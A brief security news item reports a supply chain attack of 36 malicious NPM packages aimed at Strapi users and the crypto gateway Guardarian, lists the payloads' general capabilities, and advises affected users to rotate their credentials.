Guardarian Users Targeted in Malicious NPM Package Attack
A recent supply chain attack has targeted the Strapi ecosystem, involving 36 malicious NPM packages. These packages, published across four accounts, deliver various payloads capable of executing Redis code, escaping Docker containers, harvesting credentials, and deploying reverse shells. The attack specifically targets the cryptocurrency payment gateway Guardarian, using a Guardarian API module and targeting wallet files. The campaign appears tailored for Strapi users, focusing on Linux systems and exploiting Redis instances used as Strapi cache backends. Users who installed these packages are advised to rotate all credentials, including database passwords and API keys, to mitigate potential security breaches. 
